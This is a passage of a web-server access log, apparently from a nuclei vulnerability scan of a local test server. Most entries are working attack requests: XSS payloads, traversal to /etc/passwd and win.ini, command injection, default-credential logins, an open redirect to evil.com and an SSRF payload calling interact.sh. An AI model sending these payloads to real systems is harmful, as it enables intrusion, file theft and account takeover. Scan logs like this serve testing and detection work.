"13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx?replaceCurrent=1&url=http://127.0.0.1/ecp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_next/static/../server/pages-manifest.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xprober.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?redirect=//evil.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__raw/services/server/info/server-info?output_mode=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Partners/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.production.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslvpn_logon.shtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.028","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/_samples/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"userid=kevinlab&userpass=kevin003","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dashboard/proc.php?type=login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"SPOOLDIR=test\x22.system(id).\x22&recheck=Recheck","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"yr=2021&mh=6&fname=../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /viewlog.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpmudev-updates/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://interact.sh/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 